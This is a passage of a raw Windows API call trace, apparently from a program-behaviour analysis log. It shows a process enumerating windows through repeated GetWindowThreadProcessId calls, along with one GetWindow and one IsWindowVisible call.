	[0093.136] GetWindowThreadProcessId (in: hWnd=0x10076, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x4ac
	[0093.136] GetWindowThreadProcessId (in: hWnd=0x10078, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x4ac
	[0093.136] GetWindowThreadProcessId (in: hWnd=0x1005a, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x4ac
	[0093.137] GetWindowThreadProcessId (in: hWnd=0x3013c, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x538
	[0093.137] GetWindowThreadProcessId (in: hWnd=0x300b2, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x4ac
	[0093.137] GetWindowThreadProcessId (in: hWnd=0x300ee, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x4ac
	[0093.137] GetWindowThreadProcessId (in: hWnd=0x400c0, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x4ac
	[0093.137] GetWindowThreadProcessId (in: hWnd=0x10144, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x514
	[0093.137] GetWindowThreadProcessId (in: hWnd=0x10122, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x4ac
	[0093.137] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x778
	[0093.137] GetWindowThreadProcessId (in: hWnd=0x20028, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x778
	[0093.138] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x4ac
	[0093.138] GetWindowThreadProcessId (in: hWnd=0x100fa, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x458
	[0093.138] GetWindowThreadProcessId (in: hWnd=0x500a0, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x4ac
	[0093.138] GetWindowThreadProcessId (in: hWnd=0x5026a, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x838
	[0093.139] GetWindow (hWnd=0x5026a, uCmd=0x4) returned 0x0
	[0093.140] IsWindowVisible (hWnd=0x5026a) returned 0
	[0093.140] GetWindowThreadProcessId (in: hWnd=0x50160, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0xb2c
	[0093.140] GetWindowThreadProcessId (in: hWnd=0x40298, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x8d4
	[0093.140] GetWindowThreadProcessId (in: hWnd=0x4015e, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x874
	[0093.141] GetWindowThreadProcessId (in: hWnd=0x50268, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x9a8
	[0093.141] GetWindowThreadProcessId (in: hWnd=0x60106, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0xb40
	[0093.141] GetWindowThreadProcessId (in: hWnd=0x10262, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0xa00
	[0093.141] GetWindowThreadProcessId (in: hWnd=0x900a6, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x4ac
	[0093.141] GetWindowThreadProcessId (in: hWnd=0x300c6, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x4ac
	[0093.141] GetWindowThreadProcessId (in: hWnd=0x400d0, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x4ac
	[0093.141] GetWindowThreadProcessId (in: hWnd=0x400f0, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x4ac
	[0093.141] GetWindowThreadProcessId (in: hWnd=0x300de, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x4ac
	[0093.142] GetWindowThreadProcessId (in: hWnd=0x300ca, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x4ac
	[0093.142] GetWindowThreadProcessId (in: hWnd=0x400c4, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x4ac
	[0093.142] GetWindowThreadProcessId (in: hWnd=0x300ac, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x4ac
	[0093.142] GetWindowThreadProcessId (in: hWnd=0x1025e, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x9f0
	[0093.142] GetWindowThreadProcessId (in: hWnd=0x10258, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x9e0
	[0093.142] GetWindowThreadProcessId (in: hWnd=0x10254, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x9d0
	[0093.142] GetWindowThreadProcessId (in: hWnd=0x10250, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x9c0
	[0093.142] GetWindowThreadProcessId (in: hWnd=0x1024c, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x9b0
	[0093.143] GetWindowThreadProcessId (in: hWnd=0x10248, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x9a0
	[0093.143] GetWindowThreadProcessId (in: hWnd=0x10244, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x990
	[0093.143] GetWindowThreadProcessId (in: hWnd=0x10240, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x980
	[0093.143] GetWindowThreadProcessId (in: hWnd=0x1023c, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x970
	[0093.143] GetWindowThreadProcessId (in: hWnd=0x10238, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x960
	[0093.143] GetWindowThreadProcessId (in: hWnd=0x10234, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x950
	[0093.143] GetWindowThreadProcessId (in: hWnd=0x10230, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x940
	[0093.144] GetWindowThreadProcessId (in: hWnd=0x1022c, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x930
	[0093.144] GetWindowThreadProcessId (in: hWnd=0x10228, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x920
	[0093.144] GetWindowThreadProcessId (in: hWnd=0x10224, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x910
	[0093.144] GetWindowThreadProcessId (in: hWnd=0x10220, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x900
	[0093.144] GetWindowThreadProcessId (in: hWnd=0x1021c, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x8f0
	[0093.144] GetWindowThreadProcessId (in: hWnd=0x10218, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x8e0
	[0093.144] GetWindowThreadProcessId (in: hWnd=0x10214, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x8d0
	[0093.145] GetWindowThreadProcessId (in: hWnd=0x10210, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x8c0
	[0093.145] GetWindowThreadProcessId (in: hWnd=0x1020c, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x8b0
	[0093.145] GetWindowThreadProcessId (in: hWnd=0x10208, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x8a0
	[0093.145] GetWindowThreadProcessId (in: hWnd=0x10204, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x890
	[0093.145] GetWindowThreadProcessId (in: hWnd=0x10200, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x880
	[0093.145] GetWindowThreadProcessId (in: hWnd=0x101fc, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x870
	[0093.145] GetWindowThreadProcessId (in: hWnd=0x101f8, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x860
	[0093.146] GetWindowThreadProcessId (in: hWnd=0x101f4, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x850
	[0093.146] GetWindowThreadProcessId (in: hWnd=0x101f0, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x840
	[0093.146] GetWindowThreadProcessId (in: hWnd=0x101ec, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x830
	[0093.146] GetWindowThreadProcessId (in: hWnd=0x101e8, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x820
	[0093.146] GetWindowThreadProcessId (in: hWnd=0x101e4, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x810
	[0093.146] GetWindowThreadProcessId (in: hWnd=0x101e0, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x20c
	[0093.146] GetWindowThreadProcessId (in: hWnd=0x101dc, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x7c4
	[0093.147] GetWindowThreadProcessId (in: hWnd=0x101d8, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0xc0
	[0093.147] GetWindowThreadProcessId (in: hWnd=0x101d4, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x688
	[0093.147] GetWindowThreadProcessId (in: hWnd=0x101d0, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x6c0
	[0093.147] GetWindowThreadProcessId (in: hWnd=0x101cc, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x408
	[0093.147] GetWindowThreadProcessId (in: hWnd=0x101c8, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x7d4
	[0093.147] GetWindowThreadProcessId (in: hWnd=0x101c4, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x544
	[0093.147] GetWindowThreadProcessId (in: hWnd=0x101c0, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x540
	[0093.147] GetWindowThreadProcessId (in: hWnd=0x101bc, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x71c
	[0093.148] GetWindowThreadProcessId (in: hWnd=0x101b8, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x31c
	[0093.148] GetWindowThreadProcessId (in: hWnd=0x101b4, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x7ec
	[0093.148] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x5b8
	[0093.148] GetWindowThreadProcessId (in: hWnd=0x101ac, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x754
	[0093.148] GetWindowThreadProcessId (in: hWnd=0x101a8, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x664
	[0093.154] GetWindowThreadProcessId (in: hWnd=0x101a6, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x640
	[0093.154] GetWindowThreadProcessId (in: hWnd=0x101a2, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x700
	[0093.154] GetWindowThreadProcessId (in: hWnd=0x1019e, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x410
	[0093.154] GetWindowThreadProcessId (in: hWnd=0x1019a, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x7a0
	[0093.154] GetWindowThreadProcessId (in: hWnd=0x10196, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x3b4
	[0093.154] GetWindowThreadProcessId (in: hWnd=0x10192, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x5cc
	[0093.154] GetWindowThreadProcessId (in: hWnd=0x1018e, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x5d4
	[0093.155] GetWindowThreadProcessId (in: hWnd=0x1018a, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x7c0
	[0093.155] GetWindowThreadProcessId (in: hWnd=0x10186, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x364
	[0093.155] GetWindowThreadProcessId (in: hWnd=0x10182, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x240
	[0093.155] GetWindowThreadProcessId (in: hWnd=0x1017e, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x560
	[0093.155] GetWindowThreadProcessId (in: hWnd=0x10176, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x57c
	[0093.155] GetWindowThreadProcessId (in: hWnd=0x10172, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x7b0
	[0093.155] GetWindowThreadProcessId (in: hWnd=0x1016e, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x6a4
	[0093.155] GetWindowThreadProcessId (in: hWnd=0x1016a, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x32c
	[0093.156] GetWindowThreadProcessId (in: hWnd=0x20164, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x670
	[0093.156] GetWindowThreadProcessId (in: hWnd=0x30158, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x4f0
	[0093.156] GetWindowThreadProcessId (in: hWnd=0x1014e, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x514
	[0093.156] GetWindowThreadProcessId (in: hWnd=0x1014c, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x50c
	[0093.156] GetWindowThreadProcessId (in: hWnd=0x20142, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x514
	[0093.156] GetWindowThreadProcessId (in: hWnd=0x10136, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x50c
	[0093.156] GetWindowThreadProcessId (in: hWnd=0x1012e, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x514
	[0093.156] GetWindowThreadProcessId (in: hWnd=0x10124, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x4f0
	[0093.157] GetWindowThreadProcessId (in: hWnd=0x200d6, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x4f0
	[0093.157] GetWindowThreadProcessId (in: hWnd=0x200a8, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x58c
	[0093.157] GetWindowThreadProcessId (in: hWnd=0x1010c, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x578
	[0093.157] GetWindowThreadProcessId (in: hWnd=0x10108, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x458
	[0093.158] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x530
	[0093.158] GetWindowThreadProcessId (in: hWnd=0x50094, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x4ac
	[0093.158] GetWindowThreadProcessId (in: hWnd=0x1008a, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x508
	[0093.158] GetWindowThreadProcessId (in: hWnd=0x10088, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x4ac
	[0093.158] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x4f4
	[0093.158] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x4ac
	[0093.158] GetWindowThreadProcessId (in: hWnd=0x1006a, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x4ac
	[0093.159] GetWindowThreadProcessId (in: hWnd=0x20020, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x794
	[0093.159] GetWindowThreadProcessId (in: hWnd=0x10066, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x4ac
	[0093.159] GetWindowThreadProcessId (in: hWnd=0x10052, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x4ac
	[0093.159] GetWindowThreadProcessId (in: hWnd=0x1004a, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x458
	[0093.159] GetWindowThreadProcessId (in: hWnd=0x20046, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x458
	[0093.159] GetWindowThreadProcessId (in: hWnd=0x30044, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x448
	[0093.159] GetWindowThreadProcessId (in: hWnd=0x20018, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x778
	[0093.159] GetWindowThreadProcessId (in: hWnd=0x100f2, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x458
	[0093.160] GetWindowThreadProcessId (in: hWnd=0x3013e, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x538
	[0093.160] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x4ac
	[0093.160] GetWindowThreadProcessId (in: hWnd=0x10054, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x4ac
	[0093.160] GetWindowThreadProcessId (in: hWnd=0x3028a, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0xbdc
	[0093.160] GetWindowThreadProcessId (in: hWnd=0x5026c, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0xbe0
	[0093.160] GetWindowThreadProcessId (in: hWnd=0x6015a, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x9f4
	[0093.160] GetWindowThreadProcessId (in: hWnd=0x30296, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x964
	[0093.161] GetWindowThreadProcessId (in: hWnd=0x50116, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x9e8
	[0093.161] GetWindowThreadProcessId (in: hWnd=0x5011c, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x9e8
	[0093.161] GetWindowThreadProcessId (in: hWnd=0x30162, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0xb40
	[0093.161] GetWindowThreadProcessId (in: hWnd=0x10264, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0xa00
	[0093.161] GetWindowThreadProcessId (in: hWnd=0x10260, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x9f0
	[0093.161] GetWindowThreadProcessId (in: hWnd=0x1025a, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x9e0
	[0093.161] GetWindowThreadProcessId (in: hWnd=0x10256, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x9d0
	[0093.161] GetWindowThreadProcessId (in: hWnd=0x10252, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x9c0
	[0093.162] GetWindowThreadProcessId (in: hWnd=0x1024e, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x9b0
	[0093.162] GetWindowThreadProcessId (in: hWnd=0x1024a, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x9a0
	[0093.162] GetWindowThreadProcessId (in: hWnd=0x10246, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x990
	[0093.162] GetWindowThreadProcessId (in: hWnd=0x10242, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x980
	[0093.162] GetWindowThreadProcessId (in: hWnd=0x1023e, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x970
	[0093.162] GetWindowThreadProcessId (in: hWnd=0x1023a, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x960
	[0093.162] GetWindowThreadProcessId (in: hWnd=0x10236, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x950
	[0093.162] GetWindowThreadProcessId (in: hWnd=0x10232, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x940
	[0093.163] GetWindowThreadProcessId (in: hWnd=0x1022e, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x930
	[0093.163] GetWindowThreadProcessId (in: hWnd=0x1022a, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x920
	[0093.163] GetWindowThreadProcessId (in: hWnd=0x10226, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x910
	[0093.163] GetWindowThreadProcessId (in: hWnd=0x10222, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x900
	[0093.163] GetWindowThreadProcessId (in: hWnd=0x1021e, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x8f0
	[0093.163] GetWindowThreadProcessId (in: hWnd=0x1021a, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x8e0
	[0093.163] GetWindowThreadProcessId (in: hWnd=0x10216, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x8d0
	[0093.163] GetWindowThreadProcessId (in: hWnd=0x10212, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x8c0
	[0093.164] GetWindowThreadProcessId (in: hWnd=0x1020e, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x8b0
	[0093.164] GetWindowThreadProcessId (in: hWnd=0x1020a, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x8a0
	[0093.164] GetWindowThreadProcessId (in: hWnd=0x10206, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x890
	[0093.164] GetWindowThreadProcessId (in: hWnd=0x10202, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x880
	[0093.164] GetWindowThreadProcessId (in: hWnd=0x101fe, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x870
	[0093.164] GetWindowThreadProcessId (in: hWnd=0x101fa, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x860
	[0093.164] GetWindowThreadProcessId (in: hWnd=0x101f6, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x850
	[0093.164] GetWindowThreadProcessId (in: hWnd=0x101f2, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x840
	[0093.165] GetWindowThreadProcessId (in: hWnd=0x101ee, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x830
	[0093.165] GetWindowThreadProcessId (in: hWnd=0x101ea, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x820
	[0093.165] GetWindowThreadProcessId (in: hWnd=0x101e6, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x810
	[0093.165] GetWindowThreadProcessId (in: hWnd=0x101e2, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x20c
	[0093.165] GetWindowThreadProcessId (in: hWnd=0x101de, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x7c4
	[0093.165] GetWindowThreadProcessId (in: hWnd=0x101da, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0xc0
	[0093.165] GetWindowThreadProcessId (in: hWnd=0x101d6, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x688
	[0093.165] GetWindowThreadProcessId (in: hWnd=0x101d2, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x6c0
	[0093.166] GetWindowThreadProcessId (in: hWnd=0x101ce, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x408
	[0093.166] GetWindowThreadProcessId (in: hWnd=0x101ca, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x7d4
	[0093.166] GetWindowThreadProcessId (in: hWnd=0x101c6, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x544
	[0093.166] GetWindowThreadProcessId (in: hWnd=0x101c2, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x540
	[0093.166] GetWindowThreadProcessId (in: hWnd=0x101be, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x71c
	[0093.166] GetWindowThreadProcessId (in: hWnd=0x101ba, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x31c
	[0093.166] GetWindowThreadProcessId (in: hWnd=0x101b6, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x7ec
	[0093.167] GetWindowThreadProcessId (in: hWnd=0x101b2, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x5b8
	[0093.167] GetWindowThreadProcessId (in: hWnd=0x101ae, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x754
	[0093.167] GetWindowThreadProcessId (in: hWnd=0x101aa, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x664
	[0093.167] GetWindowThreadProcessId (in: hWnd=0x2017a, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x640
	[0093.167] GetWindowThreadProcessId (in: hWnd=0x101a4, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x700
	[0093.167] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x410
	[0093.167] GetWindowThreadProcessId (in: hWnd=0x1019c, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x7a0
	[0093.167] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x3b4
	[0093.168] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x5cc
	[0093.168] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x5d4
	[0093.168] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x7c0
	[0093.168] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x364
	[0093.168] GetWindowThreadProcessId (in: hWnd=0x10184, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x240
	[0093.168] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x560
	[0093.168] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x57c
	[0093.168] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x7b0
	[0093.169] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x6a4
	[0093.169] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x32c
	[0093.169] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x670
	[0093.169] GetWindowThreadProcessId (in: hWnd=0x10138, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x50c
	[0093.169] GetWindowThreadProcessId (in: hWnd=0x10130, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x514
	[0093.169] GetWindowThreadProcessId (in: hWnd=0x10126, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x4f0
	[0093.169] GetWindowThreadProcessId (in: hWnd=0x10110, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x58c
	[0093.169] GetWindowThreadProcessId (in: hWnd=0x1010a, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x458
	[0093.170] GetWindowThreadProcessId (in: hWnd=0x10086, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x4f4
	[0093.170] GetWindowThreadProcessId (in: hWnd=0x2002a, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x794
